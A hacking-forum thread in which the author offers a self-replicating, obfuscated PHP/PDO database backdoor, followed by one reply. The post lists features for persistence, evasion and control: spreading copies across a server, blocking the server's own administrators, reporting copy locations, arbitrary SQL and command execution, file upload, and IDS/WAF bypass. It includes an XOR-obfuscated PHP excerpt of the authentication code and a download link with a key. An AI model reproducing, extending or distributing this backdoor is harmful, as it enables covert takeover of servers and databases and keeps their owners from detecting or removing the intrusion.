Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Semi-nonalphanumeric & Self-replicating PDO-based Database Backdoor filter_list
Author
Message
Semi-nonalphanumeric & Self-replicating PDO-based Database Backdoor #1
[Image: DJSUqOf.png]

Introduction:

I've written a self-spreading backdoor script with nothing more but symbols (meaning without alpha or numeric values) for databases. Currently, it includes only MySQL db servers but I'll enlarge the scope of its abilities in the near future.

Features of the backdoor:
  • Self-replication
    - copying itself in random directories throughout the server it's been uploaded to
  • Authentication for access
    - basic authentication system to justify the name of the script
  • Restriction of internal REMOTE_ADDRs
    - restricting the access of those who handle and manage the server
  • Logging and sending out replications' locations
    - we do need to know where it had replicated itself in order to access it
  • Database browser
    - enabling us to view the content and records within the available databases
  • Arbitrary SQL execution
    - enabling us to modify the content and records within the available databases
  • Database browser and modification menus
  • Semi-nonalphanumeric server-side source
  • PDO source with adjustments for IDS/WAF bypasses
  • Additional obfuscation within the declaration of variables/arrays/functions using Kanji symbols,
    Hepburn romanization system and particularly alt-symbols.
  • MySQL queries' obfuscation and one-line source
  • Hexdecimal/alphanumeric password generator
  • Arbitrary file uploading to a certain directory
  • Server information for the basic configuration settings of the server
  • Arbitrary command execution
  • Directory traversal menu for browsing directory contents

Future features:
  • Usage of anonymous functions without preassigned temporary name - Starfall hit me with this idea
  • Self-destruction and remote control
    - just for the sake of control
  • Complete non-alphanumeric content
    - NAN-ing the conditional statements (loops)
  • MsSQL, Oracle, PostgreSQL, Sybase, Firebird databases handling
    - because we never know what the server is running
  • Polymorphic obfuscation class to go through the source and parse it through an obfuscation algorithm
    - to make the source harder to read in addition

Construction:

The backdoor consists of two main files. The script itself and the authentication form. Aside from that, the replication copies are with a forced .php extension, of course and with an indefinite amount of replications. The others are just .txt files for the storage of their locations. The entire backdoor is written in PDO (PHP Data Objects) due to the deprecation of some of the functions for MySQL in PHP5.5+ and security measures. It is semi-nonalphanumeric due to the fact that I have NANed only the MySQL queries in case there is a sort of detection or an IDS. However, the entire authentication system and SQL execution script are completely non-alphanumeric with the exception of foreach() and if() loops. During the process of coding, I have made a separate project to handle my inputs and convert alpha and numeric values to symbols using the XOR operation in PHP. That can be witnessed on my website - http://keeperax.netai.net/Antagonism/NANGenerator.php. There is additional obfuscation within the declaration/definition of variables using Kanji symbols, Hepburn romanization system and particially alt-codes.

A small preview (part of the authentication system) is presented below:

PHP Code:
<?php $_¸=(":"^"_").('-'^'_').('-'^'_').("/"^"@").('-'^'_').'_'.('-'^'_').(":"^"_").((','^'~')^'"').("/"^"@").('-'^'_').("+"^"_").("@"^")").("."^"@").(']'^':');$_¸¸=(("."^"`")^"~");$_¸($_¸¸);$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");$_=('*'^'_').(','^'_').(":"^"_").('-'^'_').("."^"@").(">"^"_").('-'^'@').(":"^"_");$___=('*'^'_').(','^'_').(":"^"_").('-'^'_');$____=((','^'~')^'"').(">"^"_").(','^'_').(','^'_');$_=${$__}[$___];$__=${$__}[$____];$_…=('='^'_').('>'^'_').('<'^'_').('+'^'@').('$'^'@').('/'^'@').('/'^'@').('-'^'_').'_'.('*'^'_').(','^'_').(':'^'_').('-'^'_').(('-'^'|')^'`');$__…=('='^'_').('>'^'_').('<'^'_').('+'^'@').('$'^'@').('/'^'@').('/'^'@').('-'^'_').'_'.((','^'~')^'"').(">"^"_").(','^'_').(','^'_').(('-'^'|')^'`');$__=("#"^"|").('-'^'~').('%'^'`').('-'^'~').('-'^'~').(')'^'`').(("]"^":")^"(").("."^"`");$__……=("@"^"(").(":"^"_").(">"^"_").("$"^"@").(":"^"_").('-'^'_');$___……=("@"^")").(','^'_').(","^"`").("/"^"@").(']'^':').(']'^':').(":"^"_").("$"^"@");$_∙=(','^'_').(":"^"_").(','^'_').(','^'_').("@"^")").("/"^"@").("."^"@").'_'.(','^'_').("+"^"_").(">"^"_").('-'^'_').("+"^"_");$_∙();$_∙∙=(","^"`").("/"^"@").('<'^'_').(">"^"_").("+"^"_").("@"^")").("/"^"@").("."^"@").':'." ".('='^'_').(">"^"_").('<'^'_').('+'^'@').("$"^"@").("/"^"@").("/"^"@").('-'^'_').'.'.((','^'~')^'"').("@"^"(").((','^'~')^'"');if(isset($__)&&isset($_)){if($__==$__…&&$_==$_…){$__……($_∙∙);${$__}[$___……] = ("+"^"_").('-'^'_').('*'^'_').(":"^"_");}}?>

For the most of the code, there are several scripts and jQuery plugins for the smooth listing of the databases and the database menu. The requests are not asynchronous though - I didn't feel like meddling AJAX as well so.. The password generator is complete Javascript and the alphanumerical values are just extended strings so make sure you freeze the generator once you get a password because it's gonna overload your browser after running on for a while. I think the rest is all self-explanatory.

How to get it?

Link: https://mega.co.nz/#!UBlVTCSS
Key: fOGKLRWOsf-ZdfErl5KplmsCM6cMXdf_s_WoQv_OWxE

Note: Before you upload it make sure you edit the PDO constants with the appropriate credentials. The default one is: 'root' without a password.
This forum is dead

Reply

RE: Semi-nonalphanumeric & Self-replicating PDO-based Database Backdoor #2
Very interesting, a self made tool ..

I will give it a try
[Image: zombie_signature_by_meadowsdesigns-d50dssb.png]

Reply